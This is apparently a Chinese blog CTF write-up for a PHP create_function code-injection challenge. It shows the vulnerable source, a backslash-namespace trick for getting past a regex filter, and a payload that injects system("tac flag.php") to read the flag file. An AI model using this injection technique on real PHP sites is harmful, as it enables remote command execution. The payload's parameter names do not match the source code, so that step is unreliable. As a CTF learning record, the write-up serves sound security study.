PHP-create_function

原创 于 2025-02-24 20:00:30 发布 · 308 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

[题目信息]:

题目名称题目难度
PHP-create_function2

[题目考点]:

create_function ( string args , string args , string code )

[Flag格式]:

SangFor{EPHF_1PDGc2r2ysNVOrROmIjoz3-oTpY}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2082

[题目writeup]:

1、实验主页

2、源码分析

 <?php
highlight_file(__FILE__);

if(isset($_POST[‘sxf’])){
$sangfor = $_POST[‘sxf’];
if(!preg_match(’/[1]*$/isD’,$sangfor)) {
$sangfor(’’,$_GET[‘sf’]);
}
}

分析代码逻辑,对sxf进行了一个正则表达式过滤,post传参的sxf和get传参的sf进行了组合,这里我们可以使用create_function()代码注入

string create_function ( string args , string args , string code )

string $args 变量部分
string $code 方法代码部分

而正则表达式我们可以用\进行绕过,正好\在php里代表默认命名空间

php里默认命名空间是\,所有原生函数和类都在这个命名空间中。 普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径; 而如果是\function_name()这样的形式去调用函数,则是表示写了一个绝对路径。 如果在其他namespace里调用系统类,必须使用绝对路径的写法

构造payload

?show=echo 123;}system("tac flag.php");//

post:
ctf=\create_function

  1. a-z0-9_ ↩︎

create_function()漏洞利用
ALe0721的博客
04-23 845
');// 输出 3第一个参数是函数的参数列表(字符串形式),第二个参数是函数体(也是字符串)。它会把字符串当作代码执行!从 PHP 7.2 开始,这个函数已经被废弃,因为太容易被滥用了举个危险的例子");");然后服务器就会执行phpinfo()造成信息泄露。
Function create_function() is deprecated
梦里逆天的博客
08-31 5608
https://blog.youkuaiyun.com/weixin_34184561/article/details/92084636
PHP代码 之create_function()函数
snowlyzz的博客
10-05 5373
create_function 详解
[php代码审计]之create_function()函数
o3Ev的博客
04-14 2134
[php代码审计]之create_function 这篇文章结合了许多师傅的博客,再加上了一点我自己的心得 文章目录creat_function()介绍使用官方手册使用实际例子0x010x02代码分析参考博客 creat_function()介绍 适用范围:php4>=4.0.1,php5,php7 功能: 根据传递的参数创建匿名函数,并为其返回唯一名称 语法: creat_function(string $agrs,string $code) //string $agrs 声明的函数变量部分 //s
create_function()函数利用
weixin_61785633的博客
06-11 1753
最近做题发现有利用到这个函数,所以就找了这篇学习了一下,并做个笔记适用范围 : php < 7.2 7.2也有不过会有报错。
Web 应用渗透测试 01 - 命令注入(Code Injection)之 create_function
0pr
02-04 1597
这篇文章将讨论 PHP Web 应用中 **create_function** 的命令注入。命令注入,究其根源,都是未对用户提供的输入做合理过滤造成的。当然,编程语言本身内置的危险方法的使用,是命令注入频发的另一原因。
2021-第四届红帽杯网络安全大赛-Web-find_it
weixin_40872714的博客
03-26 2620
2021-第四届红帽杯网络安全大赛-Web-find_it 题目 先用目录扫描工具爆破一下目录,发现了robots.txt 访问后有了提示 1ndexx.php 直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。 http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp 把关键代码粘贴出来看一下运行流程 打开flag.php读取文件内容 打开hack.php文件,获取co
ctf+create_function()+scandir()学习
weixin_44255856的博客
04-10 1427
php官方手册中发现create_function函数,就等同于function函数的作用; create_function函数 <?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n";...
PHPcreate_function的用法总结
azzfanke的专栏
12-22 7929
php中,函数create_function主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 1.测试一 测试一主要用来循环替换数组中多个值的,我们用array_map加上create_function解决这个问题。 ############################################### function filterChars($a) {
如何在PHP中创建函数?
破损的天堂鸟博客
08-08 1099
数据类型转换:将实际参数强制转换为预期类型。这是通过使用PHP的类型转换函数如strval()等来实现的。参数默认值:为参数指定默认值以防止类型不匹配。例如,在函数声明中为参数设置默认值,这样即使传递了错误类型的参数,函数也能正常运行。异常处理:使用try-catch块捕获TypeError异常。当参数类型与预期不符时,可以抛出异常并进行相应的错误处理。检查函数签名:确保传入的参数类型正确,并且数量符合要求。这可以通过在函数定义时明确指定参数的类型和数量来实现。类型提示。
代码审计+ php 特性 +create_function代码注入 绕过
qq_52579508的博客
07-02 1079
一道道if 来分析。
create_function() 代码注入,,PHP7.2竟然还存在
热门推荐
烟敛寒林的博客
05-09 1万+
第一部分:php函数 create_function() 介绍 理论: create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 stringcreate_function (string$args ,string$code ) string$args变量部分 string$code 方法代码部分 举例: create...
探索create_function函数:功能、应用与安全考量
最新发布
m0_57836225的博客
12-10 613
在编程领域,函数是一个具有独特作用的函数,尤其在 PHP 语言中。它允许开发者在运行时动态地创建匿名函数,为程序的灵活性和动态性提供了支持。然而,如同许多强大的工具一样,如果使用不当,也可能带来安全风险。本文将深入探讨函数,详细介绍其功能、使用步骤、相关代码示例,并分析其安全方面的影响。
create function php,PHP create_function 用法 手册 | 示例代码
weixin_36472962的博客
03-09 280
In the process of migrating a PHP4 codebase to PHP5, I ran into a peculiar problem. In the library, every class was derived from a generic class called 'class_container'. 'class_container' contained a...
ThinkPHP 遇到Call to undefined function ImageCreateFrombmp() 问题解决
夜之寐 的技术博客
12-16 7381
ThinkPHP 遇到Call to undefined function ImageCreateFrombmp() 问题解决 ThinkPHP 遇到Call to undefined function ImageCreateFrombmp 问题解决 检测Gd库是否安装好 在官方社区搜索答案今天在使用Thinkphp处理图片相关的问题,始终都在报错,如下提示: Fatal error: Call to u
执行php表达式字符串,相比于eval,create_function也许是个更好的选择……
森森
09-11 3462
学过js的人都知道,js里有个eval函数,eval() 函数可计算某个字符串,并执行其中的 JavaScript 代码。 eval("x=10;y=20;document.write(x*y)") document.write(eval("2+2")) var x=10 document.write(eval(x+17)) 200 4 27 而在PHP里也有执行ph
create_function函数
12-09
create_function函数是PHP中的一个内置函数,用于动态创建匿名函数(也称为闭包函数)。这个函数在PHP 4.0.1版本中引入,但在PHP 7.2.0中被废弃,并在PHP 8.0.0中被移除。使用create_function函数可以创建一个临时的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值